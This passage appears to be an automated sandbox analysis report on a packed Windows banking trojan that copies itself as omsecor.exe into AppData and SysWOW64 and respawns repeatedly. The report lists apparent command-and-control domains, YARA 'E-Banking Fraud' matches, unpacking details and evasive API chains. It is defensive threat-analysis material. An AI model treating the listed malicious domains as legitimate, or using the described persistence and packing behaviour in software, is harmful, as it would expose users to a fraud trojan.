Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/612/675.html%
Source: omsecor.exe, 00000007.00000002.1840387008.0000000000619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/612/675.html-8a8d424fbe43573ef1LMEM
Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/612/675.htmlc
Source: fmlgbgc2p5.exe, 00000000.00000002.1641221794.000000000048D000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000000.00000002.1641457885.00000000020BB000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000004.00000002.1663858089.00000000020F9000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000004.00000002.1663673334.000000000054D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.1905585206.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.1905345423.000000000074D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000010.00000002.1905863705.0000000002026000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000010.00000002.1905714448.0000000000701000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000017.00000002.2376204202.0000000000531000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000017.00000002.2376628433.000000000206F000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 0000001A.00000002.2374629905.00000000020B4000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001A.00000002.2374377981.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
Source: omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/~
Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net

            E-Banking Fraud

            Source: Yara match	File source: Process Memory Space: fmlgbgc2p5.exe PID: 7280, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: fmlgbgc2p5.exe PID: 7336, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 7360, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 7452, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 8072, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 8100, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 8132, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 396, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 7440, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 7596, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 7612, type: MEMORYSTR
            Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 7296, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	File created: C:\Windows\SysWOW64\omsecor.exe
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 0_2_00403000	0_2_00403000
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 0_2_0042117B	0_2_0042117B
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 0_2_00405582	0_2_00405582
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 2_2_00401C41	2_2_00401C41
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 2_2_0040D2A4	2_2_0040D2A4
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 2_2_0040B51C	2_2_0040B51C
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 2_2_0040CBD0	2_2_0040CBD0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 4_2_00403000	4_2_00403000
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 4_2_0042117B	4_2_0042117B
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 4_2_00405582	4_2_00405582
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 7_2_00401C41	7_2_00401C41
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 7_2_0040D2A4	7_2_0040D2A4
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 7_2_0040B51C	7_2_0040B51C
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 7_2_0040CBD0	7_2_0040CBD0
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_00403000	13_2_00403000
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0042117B	13_2_0042117B
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_00405582	13_2_00405582
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 14_2_00401C41	14_2_00401C41
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 14_2_0040D2A4	14_2_0040D2A4
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 14_2_0040B51C	14_2_0040B51C
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 14_2_0040CBD0	14_2_0040CBD0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 16_2_00403000	16_2_00403000
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 16_2_0042117B	16_2_0042117B
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 16_2_00405582	16_2_00405582
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 18_2_00401C41	18_2_00401C41
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 18_2_0040D2A4	18_2_0040D2A4
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 18_2_0040B51C	18_2_0040B51C
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 18_2_0040CBD0	18_2_0040CBD0
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 23_2_00403000	23_2_00403000
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 23_2_0042117B	23_2_0042117B
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 23_2_00405582	23_2_00405582
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 24_2_00401C41	24_2_00401C41
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 24_2_0040D2A4	24_2_0040D2A4
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 24_2_0040B51C	24_2_0040B51C
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 24_2_0040CBD0	24_2_0040CBD0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 26_2_00403000	26_2_00403000
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 26_2_0042117B	26_2_0042117B
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 26_2_00405582	26_2_00405582
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 28_2_00401C41	28_2_00401C41
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 28_2_0040D2A4	28_2_0040D2A4
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 28_2_0040B51C	28_2_0040B51C
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 28_2_0040CBD0	28_2_0040CBD0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: String function: 00403416 appears 45 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: String function: 004054ED appears 54 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: String function: 00405493 appears 96 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: String function: 00402F98 appears 60 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: String function: 0040D5B0 appears 84 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: String function: 00405511 appears 168 times
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 004054ED appears 36 times
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 00405493 appears 64 times
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 00402F98 appears 40 times
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 0040D5B0 appears 56 times
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 00405511 appears 112 times
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: String function: 00405493 appears 32 times
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: String function: 00405511 appears 56 times
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 304
            Source: fmlgbgc2p5.exe, 00000000.00000002.1641221794.000000000048D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exe, 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exe, 00000002.00000000.1334585253.0000000000422000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exe, 00000002.00000002.1335946619.0000000000568000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exe	Binary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exe	Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: fmlgbgc2p5.exe	Static PE information: Section: .MPRESS1 ZLIB complexity 1.000390625
            Source: omsecor.exe.2.dr	Static PE information: Section: .MPRESS1 ZLIB complexity 1.000390625
            Source: omsecor.exe.7.dr	Static PE information: Section: .MPRESS1 ZLIB complexity 1.000390625
            Source: classification engine	Classification label: mal100.bank.troj.evad.winEXE@29/27@3/3
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 2_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,2_2_0040A057
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	File created: C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8132
            Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7360
            Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440
            Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7280
            Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
            Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7612
            Source: C:\Windows\SysWOW64\WerFault.exe	File created: C:\ProgramData\Microsoft\Windows\WER\Temp\4030a128-f984-41bb-8247-52fc47dfeff4
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: fmlgbgc2p5.exe	ReversingLabs: Detection: 89%
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	File read: C:\Users\user\Desktop\fmlgbgc2p5.exe
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess	graph_2-5780
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess	graph_7-5780
            Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess	graph_14-5780
            Source: unknown	Process created: C:\Users\user\Desktop\fmlgbgc2p5.exe "C:\Users\user\Desktop\fmlgbgc2p5.exe"
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Process created: C:\Users\user\Desktop\fmlgbgc2p5.exe C:\Users\user\Desktop\fmlgbgc2p5.exe
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 304
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 276
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 280
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 276
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 248
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 260
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Process created: C:\Users\user\Desktop\fmlgbgc2p5.exe C:\Users\user\Desktop\fmlgbgc2p5.exe
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
            Source: Window Recorder	Window detected: More than 3 window changes detected

            Data Obfuscation

            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Unpacked PE file: 0.2.fmlgbgc2p5.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Unpacked PE file: 2.2.fmlgbgc2p5.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 4.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 7.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Windows\SysWOW64\omsecor.exe	Unpacked PE file: 13.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Windows\SysWOW64\omsecor.exe	Unpacked PE file: 14.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 16.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 18.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Windows\SysWOW64\omsecor.exe	Unpacked PE file: 23.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Windows\SysWOW64\omsecor.exe	Unpacked PE file: 24.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 26.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 28.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Unpacked PE file: 2.2.fmlgbgc2p5.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 7.2.omsecor.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\omsecor.exe	Unpacked PE file: 14.2.omsecor.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 18.2.omsecor.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\omsecor.exe	Unpacked PE file: 24.2.omsecor.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Unpacked PE file: 28.2.omsecor.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 0_2_00404854 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__invoke_watson,GetProcAddress,GetProcAddress,__invoke_watson,0_2_00404854
            Source: initial sample	Static PE information: section where entry point is pointing to: .MPRESS2
            Source: omsecor.exe.7.dr	Static PE information: real checksum: 0x20bce should be: 0x21399
            Source: omsecor.exe.2.dr	Static PE information: real checksum: 0x20bce should be: 0x211cb
            Source: fmlgbgc2p5.exe	Static PE information: real checksum: 0x20bce should be: 0x21860
            Source: fmlgbgc2p5.exe	Static PE information: section name: .MPRESS1
            Source: fmlgbgc2p5.exe	Static PE information: section name: .MPRESS2
            Source: omsecor.exe.2.dr	Static PE information: section name: .MPRESS1
            Source: omsecor.exe.2.dr	Static PE information: section name: .MPRESS2
            Source: omsecor.exe.7.dr	Static PE information: section name: .MPRESS1
            Source: omsecor.exe.7.dr	Static PE information: section name: .MPRESS2
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 0_2_00402FDD push ecx; ret 0_2_00402FF0
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 2_2_0040D293 push ecx; ret 2_2_0040D2A3
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe	Code function: 2_2_0040CBB5 push ecx; ret 2_2_0040CBC8
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 4_2_00402FDD push ecx; ret 4_2_00402FF0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 7_2_0040D293 push ecx; ret 7_2_0040D2A3
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 7_2_0040CBB5 push ecx; ret 7_2_0040CBC8
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_00402FDD push ecx; ret 13_2_00402FF0
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 14_2_0040D293 push ecx; ret 14_2_0040D2A3
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 14_2_0040CBB5 push ecx; ret 14_2_0040CBC8
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 16_2_00402FDD push ecx; ret 16_2_00402FF0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 18_2_0040D293 push ecx; ret 18_2_0040D2A3
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 18_2_0040CBB5 push ecx; ret 18_2_0040CBC8
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 23_2_00402FDD push ecx; ret 23_2_00402FF0
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 24_2_0040D293 push ecx; ret 24_2_0040D2A3
            Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 24_2_0040CBB5 push ecx; ret 24_2_0040CBC8
